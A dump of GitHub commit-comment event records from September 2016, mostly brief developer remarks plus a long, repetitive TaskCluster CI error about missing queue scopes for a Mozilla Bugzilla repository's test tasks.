{"id":"4621572308","type":"CommitCommentEvent","actor":{"login":"kpam92"},"repo":{"name":"kpam92/codeRunr"},"payload":{"comment":{"id":19183790,"position":null,"line":null,"path":null,"commit_id":"1d46afb1b373e387c525b1eeab91f00072cbe88e","created_at":"2016-09-27T02:11:07Z","updated_at":"2016-09-27T02:11:07Z","body":"it was working minus the database at this point"}},"created_at":"2016-09-27T02:11:07Z"}
{"id":"4621574419","type":"CommitCommentEvent","actor":{"login":"AMEstudio"},"repo":{"name":"ksuther/KSImageNamed-Xcode"},"payload":{"comment":{"id":19183798,"position":null,"line":null,"path":null,"commit_id":"6388b02242e3195b90447ec668227ae84286a3c2","created_at":"2016-09-27T02:11:56Z","updated_at":"2016-09-27T02:11:56Z","body":"it is too exciting that this plugin support for Xcode 8\r\nthanks a lot!!"}},"created_at":"2016-09-27T02:11:56Z"}
{"id":"4621578780","type":"CommitCommentEvent","actor":{"login":"akosyakov"},"repo":{"name":"eclipse/xtext-core"},"payload":{"comment":{"id":19183806,"position":9,"line":334,"path":"org.eclipse.xtext.ide/src/org/eclipse/xtext/ide/server/LanguageServerImpl.xtend","commit_id":"d98fc9888231e7435d788401c9fce143841bec69","created_at":"2016-09-27T02:13:29Z","updated_at":"2016-09-27T02:13:29Z","body":"I think it won't always work, e.g. as string '10' goes before '2'"}},"created_at":"2016-09-27T02:13:29Z"}
{"id":"4621580186","type":"CommitCommentEvent","actor":{"login":"tabgok"},"repo":{"name":"tabgok/Heimdallr"},"payload":{"comment":{"id":19183808,"position":null,"line":null,"path":null,"commit_id":"936876fda9a439426e7c57c6fd702d18475e9487","created_at":"2016-09-27T02:14:03Z","updated_at":"2016-09-27T02:14:03Z","body":"Updating the readme to talk about the state of the program\r\n"}},"created_at":"2016-09-27T02:14:03Z"}
{"id":"4621583859","type":"CommitCommentEvent","actor":{"login":"artificemm"},"repo":{"name":"thebitcorps/Buildify"},"payload":{"comment":{"id":19183814,"position":5,"line":9,"path":"db/migrate/20160920013148_add_purchase_order_to_payment.rb","commit_id":"ba2a2f27e7b07131e6353e741df5b317e8280fed","created_at":"2016-09-27T02:15:31Z","updated_at":"2016-09-27T02:15:31Z","body":"whats up with these?"}},"created_at":"2016-09-27T02:15:31Z"}
{"id":"4621586100","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-bteam/bmo"},"payload":{"comment":{"id":19183816,"position":null,"line":null,"path":null,"commit_id":"93826b5e5289cef8b6b15ba630fe522d236e9933","created_at":"2016-09-27T02:16:26Z","updated_at":"2016-09-27T02:16:26Z","body":"Submitting the task to TaskCluster failed. You didn't give the task-graph scopes allowing it define tasks on the queue.Details:\n\n```js\n[\n    {\n        \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"queue:route:notify.email.dylan@hardison.net.on-any\\\",\\n    \\\"queue:route:notify.irc-channel.#bteam.on-failed\\\",\\n    \\\"queue:route:notify.irc-channel.#bteam.on-exception\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla-bteam/bmo:branch:development\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:define-task:aws-provisioner-v1/b2gtest\\\",\\n  \\\"queue:route:gaia-taskcluster\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-development.*\\\",\\n  \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-master.*\\\",\\n  \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n  \\\"queue:route:tc-treeherder.bmo-development.*\\\",\\n  \\\"queue:route:tc-treeherder.bmo-master.*\\\",\\n  \\\"queue:route:tc-treeherder.bmo-upstream-merge.*\\\",\\n  \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-development.*\\\",\\n  \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-master.*\\\",\\n  \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"queue:route:notify.email.dylan@hardison.net.on-any\\\", and\\n    - \\\"queue:route:notify.irc-channel.#bteam.on-failed\\\", and\\n    - \\\"queue:route:notify.irc-channel.#bteam.on-exception\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"cx9Mq_t9Tn2HX57Qy5513A\\\"}\\n  payload:  {\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"routes\\\": [\\n    \\\"notify.email.dylan@hardison.net.on-any\\\",\\n    \\\"notify.irc-channel.#bteam.on-failed\\\",\\n    \\\"notify.irc-channel.#bteam.on-exception\\\"\\n  ],\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.opened\\\",\\n        \\\"pull_request.synchronize\\\",\\n        \\\"pull_request.reopened\\\",\\n        \\\"push\\\"\\n      ]\\n    },\\n    \\\"treeherder\\\": {\\n      \\\"symbol\\\": \\\"Sel\\\",\\n      \\\"machine\\\": {\\n        \\\"platform\\\": \\\"linux64\\\",\\n        \\\"build\\\": {\\n          \\\"platform\\\": \\\"linux64\\\"\\n        }\\n      }\\n    }\\n  },\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 3600,\\n    \\\"reruns\\\": 3,\\n    \\\"image\\\": \\\"mozillabteam/bmo-ci\\\",\\n    \\\"command\\\": [\\n      \\\"runtests.sh\\\"\\n    ],\\n    \\\"env\\\": {\\n      \\\"TEST_SUITE\\\": \\\"selenium\\\",\\n      \\\"GITHUB_EVENT\\\": \\\"push\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"development\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"1f36a82d520dd8a05326c222fff5152e10a716ab\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"development\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/mozilla-bteam/bmo.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"dylanwh\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"93826b5e5289cef8b6b15ba630fe522d236e9933\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"development\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"dylan@hardison.net\\\"\\n    },\\n    \\\"artifacts\\\": {\\n      \\\"public/runtests_log\\\": {\\n        \\\"type\\\": \\\"file\\\",\\n        \\\"path\\\": \\\"/var/log/runtests.log\\\",\\n        \\\"expires\\\": \\\"2018-02-17T17:33:38.806Z\\\"\\n      },\\n      \\\"public/httpd_error_log\\\": {\\n        \\\"type\\\": \\\"file\\\",\\n        \\\"path\\\": \\\"/var/log/httpd/error_log\\\",\\n        \\\"expires\\\": \\\"2018-02-17T17:33:38.806Z\\\"\\n      },\\n      \\\"public/selenium_log\\\\\\\"\\\": {\\n        \\\"type\\\": \\\"file\\\",\\n        \\\"path\\\": \\\"/selenium.log\\\",\\n        \\\"expires\\\": \\\"2018-02-17T17:33:38.806Z\\\"\\n      }\\n    }\\n  },\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"Selenium Tests\\\",\\n    \\\"description\\\": \\\"Selenium Tests\\\",\\n    \\\"owner\\\": \\\"dylan@hardison.net\\\",\\n    \\\"source\\\": \\\"https://github.com/mozilla-bteam/bmo.git\\\"\\n  },\\n  \\\"created\\\": \\\"2016-09-27T02:16:26.168Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-28T02:16:26.168Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"Kgim6VDJR4KCRicihcOUZw\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"scopes\\\": [],\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-28T02:16:26.168Z\\\"\\n}\\n  time:     2016-09-27T02:16:26.466Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"queue:route:notify.email.dylan@hardison.net.on-any\\\",\\n      \\\"queue:route:notify.irc-channel.#bteam.on-failed\\\",\\n      \\\"queue:route:notify.irc-channel.#bteam.on-exception\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla-bteam/bmo:branch:development\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:define-task:aws-provisioner-v1/b2gtest\\\",\\n    \\\"queue:route:gaia-taskcluster\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-development.*\\\",\\n    \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-master.*\\\",\\n    \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n    \\\"queue:route:tc-treeherder.bmo-development.*\\\",\\n    \\\"queue:route:tc-treeherder.bmo-master.*\\\",\\n    \\\"queue:route:tc-treeherder.bmo-upstream-merge.*\\\",\\n    \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-development.*\\\",\\n    \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-master.*\\\",\\n    \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n        \"error\": {\n            \"code\": \"InsufficientScopes\",\n            \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"queue:route:notify.email.dylan@hardison.net.on-any\\\",\\n    \\\"queue:route:notify.irc-channel.#bteam.on-failed\\\",\\n    \\\"queue:route:notify.irc-channel.#bteam.on-exception\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla-bteam/bmo:branch:development\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:define-task:aws-provisioner-v1/b2gtest\\\",\\n  \\\"queue:route:gaia-taskcluster\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-development.*\\\",\\n  \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-master.*\\\",\\n  \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n  \\\"queue:route:tc-treeherder.bmo-development.*\\\",\\n  \\\"queue:route:tc-treeherder.bmo-master.*\\\",\\n  \\\"queue:route:tc-treeherder.bmo-upstream-merge.*\\\",\\n  \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-development.*\\\",\\n  \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-master.*\\\",\\n  \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"queue:route:notify.email.dylan@hardison.net.on-any\\\", and\\n    - \\\"queue:route:notify.irc-channel.#bteam.on-failed\\\", and\\n    - \\\"queue:route:notify.irc-channel.#bteam.on-exception\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"cx9Mq_t9Tn2HX57Qy5513A\\\"}\\n  payload:  {\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"routes\\\": [\\n    \\\"notify.email.dylan@hardison.net.on-any\\\",\\n    \\\"notify.irc-channel.#bteam.on-failed\\\",\\n    \\\"notify.irc-channel.#bteam.on-exception\\\"\\n  ],\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.opened\\\",\\n        \\\"pull_request.synchronize\\\",\\n        \\\"pull_request.reopened\\\",\\n        \\\"push\\\"\\n      ]\\n    },\\n    \\\"treeherder\\\": {\\n      \\\"symbol\\\": \\\"Sel\\\",\\n      \\\"machine\\\": {\\n        \\\"platform\\\": \\\"linux64\\\",\\n        \\\"build\\\": {\\n          \\\"platform\\\": \\\"linux64\\\"\\n        }\\n      }\\n    }\\n  },\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 3600,\\n    \\\"reruns\\\": 3,\\n    \\\"image\\\": \\\"mozillabteam/bmo-ci\\\",\\n    \\\"command\\\": [\\n      \\\"runtests.sh\\\"\\n    ],\\n    \\\"env\\\": {\\n      \\\"TEST_SUITE\\\": \\\"selenium\\\",\\n      \\\"GITHUB_EVENT\\\": \\\"push\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"development\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"1f36a82d520dd8a05326c222fff5152e10a716ab\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"development\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/mozilla-bteam/bmo.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"dylanwh\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"93826b5e5289cef8b6b15ba630fe522d236e9933\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"development\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"dylan@hardison.net\\\"\\n    },\\n    \\\"artifacts\\\": {\\n      \\\"public/runtests_log\\\": {\\n        \\\"type\\\": \\\"file\\\",\\n        \\\"path\\\": \\\"/var/log/runtests.log\\\",\\n        \\\"expires\\\": \\\"2018-02-17T17:33:38.806Z\\\"\\n      },\\n      \\\"public/httpd_error_log\\\": {\\n        \\\"type\\\": \\\"file\\\",\\n        \\\"path\\\": \\\"/var/log/httpd/error_log\\\",\\n        \\\"expires\\\": \\\"2018-02-17T17:33:38.806Z\\\"\\n      },\\n      \\\"public/selenium_log\\\\\\\"\\\": {\\n        \\\"type\\\": \\\"file\\\",\\n        \\\"path\\\": \\\"/selenium.log\\\",\\n        \\\"expires\\\": \\\"2018-02-17T17:33:38.806Z\\\"\\n      }\\n    }\\n  },\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"Selenium Tests\\\",\\n    \\\"description\\\": \\\"Selenium Tests\\\",\\n    \\\"owner\\\": \\\"dylan@hardison.net\\\",\\n    \\\"source\\\": \\\"https://github.com/mozilla-bteam/bmo.git\\\"\\n  },\\n  \\\"created\\\": \\\"2016-09-27T02:16:26.168Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-28T02:16:26.168Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"Kgim6VDJR4KCRicihcOUZw\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"scopes\\\": [],\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-28T02:16:26.168Z\\\"\\n}\\n  time:     2016-09-27T02:16:26.466Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"queue:route:notify.email.dylan@hardison.net.on-any\\\",\\n      \\\"queue:route:notify.irc-channel.#bteam.on-failed\\\",\\n      \\\"queue:route:notify.irc-channel.#bteam.on-exception\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla-bteam/bmo:branch:development\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:define-task:aws-provisioner-v1/b2gtest\\\",\\n    \\\"queue:route:gaia-taskcluster\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-development.*\\\",\\n    \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-master.*\\\",\\n    \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n    \\\"queue:route:tc-treeherder.bmo-development.*\\\",\\n    \\\"queue:route:tc-treeherder.bmo-master.*\\\",\\n    \\\"queue:route:tc-treeherder.bmo-upstream-merge.*\\\",\\n    \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-development.*\\\",\\n    \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-master.*\\\",\\n    \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n            \"requestInfo\": {\n                \"method\": \"defineTask\",\n                \"params\": {\n                    \"taskId\": \"cx9Mq_t9Tn2HX57Qy5513A\"\n                },\n                \"payload\": {\n                    \"provisionerId\": \"aws-provisioner-v1\",\n                    \"workerType\": \"github-worker\",\n                    \"routes\": [\n                        \"notify.email.dylan@hardison.net.on-any\",\n                        \"notify.irc-channel.#bteam.on-failed\",\n                        \"notify.irc-channel.#bteam.on-exception\"\n                    ],\n                    \"extra\": {\n                        \"github\": {\n                            \"env\": true,\n                            \"events\": [\n                                \"pull_request.opened\",\n                                \"pull_request.synchronize\",\n                                \"pull_request.reopened\",\n                                \"push\"\n                            ]\n                        },\n                        \"treeherder\": {\n                            \"symbol\": \"Sel\",\n                            \"machine\": {\n                                \"platform\": \"linux64\",\n                                \"build\": {\n                                    \"platform\": \"linux64\"\n                                }\n                            }\n                        }\n                    },\n                    \"payload\": {\n                        \"maxRunTime\": 3600,\n                        \"reruns\": 3,\n                        \"image\": \"mozillabteam/bmo-ci\",\n                        \"command\": [\n                            \"runtests.sh\"\n                        ],\n                        \"env\": {\n                            \"TEST_SUITE\": \"selenium\",\n                            \"GITHUB_EVENT\": \"push\",\n                            \"GITHUB_BRANCH\": \"development\",\n                            \"GITHUB_BASE_SHA\": \"1f36a82d520dd8a05326c222fff5152e10a716ab\",\n                            \"GITHUB_BASE_BRANCH\": \"development\",\n                            \"GITHUB_HEAD_REPO_URL\": \"https://github.com/mozilla-bteam/bmo.git\",\n                            \"GITHUB_HEAD_USER\": \"dylanwh\",\n                            \"GITHUB_HEAD_SHA\": \"93826b5e5289cef8b6b15ba630fe522d236e9933\",\n                            \"GITHUB_HEAD_BRANCH\": \"development\",\n                            \"GITHUB_HEAD_USER_EMAIL\": \"dylan@hardison.net\"\n                        },\n                        \"artifacts\": {\n                            \"public/runtests_log\": {\n                                \"type\": \"file\",\n                                \"path\": \"/var/log/runtests.log\",\n                                \"expires\": \"2018-02-17T17:33:38.806Z\"\n                            },\n                            \"public/httpd_error_log\": {\n                                \"type\": \"file\",\n                                \"path\": \"/var/log/httpd/error_log\",\n                                \"expires\": \"2018-02-17T17:33:38.806Z\"\n                            },\n                            \"public/selenium_log\\\"\": {\n                                \"type\": \"file\",\n                                \"path\": \"/selenium.log\",\n                                \"expires\": \"2018-02-17T17:33:38.806Z\"\n                            }\n                        }\n                    },\n                    \"metadata\": {\n                        \"name\": \"Selenium Tests\",\n                        \"description\": \"Selenium Tests\",\n                        \"owner\": \"dylan@hardison.net\",\n                        \"source\": \"https://github.com/mozilla-bteam/bmo.git\"\n                    },\n                    \"created\": \"2016-09-27T02:16:26.168Z\",\n                    \"deadline\": \"2016-09-28T02:16:26.168Z\",\n                    \"schedulerId\": \"task-graph-scheduler\",\n                    \"taskGroupId\": \"Kgim6VDJR4KCRicihcOUZw\",\n                    \"dependencies\": [],\n                    \"requires\": \"all-completed\",\n                    \"priority\": \"normal\",\n                    \"retries\": 5,\n                    \"scopes\": [],\n                    \"tags\": {},\n                    \"expires\": \"2017-09-28T02:16:26.168Z\"\n                },\n                \"time\": \"2016-09-27T02:16:26.466Z\"\n            },\n            \"details\": {\n                \"scopesets\": [\n                    [\n                        \"queue:route:notify.email.dylan@hardison.net.on-any\",\n                        \"queue:route:notify.irc-channel.#bteam.on-failed\",\n                        \"queue:route:notify.irc-channel.#bteam.on-exception\"\n                    ]\n                ],\n                \"scopes\": [\n                    \"assume:repo:github.com/mozilla-bteam/bmo:branch:development\",\n                    \"queue:create-task:aws-provisioner-v1/github-worker\",\n                    \"queue:define-task:aws-provisioner-v1/b2gtest\",\n                    \"queue:route:gaia-taskcluster\",\n                    \"queue:route:index.garbage.*\",\n                    \"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-development.*\",\n                    \"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-master.*\",\n                    \"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-upstream-merge.*\",\n                    \"queue:route:tc-treeherder.bmo-development.*\",\n                    \"queue:route:tc-treeherder.bmo-master.*\",\n                    \"queue:route:tc-treeherder.bmo-upstream-merge.*\",\n                    \"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-development.*\",\n                    \"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-master.*\",\n                    \"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-upstream-merge.*\",\n                    \"secrets:get:garbage/*\",\n                    \"secrets:set:garbage/*\"\n                ]\n            }\n        }\n    },\n    {\n        \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"queue:route:notify.email.dylan@hardison.net.on-any\\\",\\n    \\\"queue:route:notify.irc-channel.#bteam.on-failed\\\",\\n    \\\"queue:route:notify.irc-channel.#bteam.on-exception\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla-bteam/bmo:branch:development\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:define-task:aws-provisioner-v1/b2gtest\\\",\\n  \\\"queue:route:gaia-taskcluster\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-development.*\\\",\\n  \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-master.*\\\",\\n  \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n  \\\"queue:route:tc-treeherder.bmo-development.*\\\",\\n  \\\"queue:route:tc-treeherder.bmo-master.*\\\",\\n  \\\"queue:route:tc-treeherder.bmo-upstream-merge.*\\\",\\n  \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-development.*\\\",\\n  \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-master.*\\\",\\n  \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"queue:route:notify.email.dylan@hardison.net.on-any\\\", and\\n    - \\\"queue:route:notify.irc-channel.#bteam.on-failed\\\", and\\n    - \\\"queue:route:notify.irc-channel.#bteam.on-exception\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"XzF7B--6Soeyh-2-Czy6uA\\\"}\\n  payload:  {\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"routes\\\": [\\n    \\\"notify.email.dylan@hardison.net.on-any\\\",\\n    \\\"notify.irc-channel.#bteam.on-failed\\\",\\n    \\\"notify.irc-channel.#bteam.on-exception\\\"\\n  ],\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.opened\\\",\\n        \\\"pull_request.synchronize\\\",\\n        \\\"pull_request.reopened\\\",\\n        \\\"push\\\"\\n      ]\\n    },\\n    \\\"treeherder\\\": {\\n      \\\"symbol\\\": \\\"Doc\\\",\\n      \\\"machine\\\": {\\n        \\\"platform\\\": \\\"linux64\\\",\\n        \\\"build\\\": {\\n          \\\"platform\\\": \\\"linux64\\\"\\n        }\\n      }\\n    }\\n  },\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 3600,\\n    \\\"reruns\\\": 3,\\n    \\\"image\\\": \\\"mozillabteam/bmo-ci\\\",\\n    \\\"command\\\": [\\n      \\\"runtests.sh\\\"\\n    ],\\n    \\\"env\\\": {\\n      \\\"TEST_SUITE\\\": \\\"docs\\\",\\n      \\\"GITHUB_EVENT\\\": \\\"push\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"development\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"1f36a82d520dd8a05326c222fff5152e10a716ab\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"development\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/mozilla-bteam/bmo.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"dylanwh\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"93826b5e5289cef8b6b15ba630fe522d236e9933\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"development\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"dylan@hardison.net\\\"\\n    },\\n    \\\"artifacts\\\": {\\n      \\\"public/runtests_log\\\": {\\n        \\\"type\\\": \\\"file\\\",\\n        \\\"path\\\": \\\"/var/log/runtests.log\\\",\\n        \\\"expires\\\": \\\"2018-02-17T17:33:38.806Z\\\"\\n      }\\n    }\\n  },\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"Documentation Build Test\\\",\\n    \\\"description\\\": \\\"Documentation Build Test\\\",\\n    \\\"owner\\\": \\\"dylan@hardison.net\\\",\\n    \\\"source\\\": \\\"https://github.com/mozilla-bteam/bmo.git\\\"\\n  },\\n  \\\"created\\\": \\\"2016-09-27T02:16:26.166Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-28T02:16:26.166Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"Kgim6VDJR4KCRicihcOUZw\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"scopes\\\": [],\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-28T02:16:26.166Z\\\"\\n}\\n  time:     2016-09-27T02:16:26.481Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"queue:route:notify.email.dylan@hardison.net.on-any\\\",\\n      \\\"queue:route:notify.irc-channel.#bteam.on-failed\\\",\\n      \\\"queue:route:notify.irc-channel.#bteam.on-exception\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla-bteam/bmo:branch:development\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:define-task:aws-provisioner-v1/b2gtest\\\",\\n    \\\"queue:route:gaia-taskcluster\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-development.*\\\",\\n    \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-master.*\\\",\\n    \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n    \\\"queue:route:tc-treeherder.bmo-development.*\\\",\\n    \\\"queue:route:tc-treeherder.bmo-master.*\\\",\\n    \\\"queue:route:tc-treeherder.bmo-upstream-merge.*\\\",\\n    \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-development.*\\\",\\n    \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-master.*\\\",\\n    \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n        \"error\": {\n            \"code\": \"InsufficientScopes\",\n            \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"queue:route:notify.email.dylan@hardison.net.on-any\\\",\\n    \\\"queue:route:notify.irc-channel.#bteam.on-failed\\\",\\n    \\\"queue:route:notify.irc-channel.#bteam.on-exception\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla-bteam/bmo:branch:development\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:define-task:aws-provisioner-v1/b2gtest\\\",\\n  \\\"queue:route:gaia-taskcluster\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-development.*\\\",\\n  \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-master.*\\\",\\n  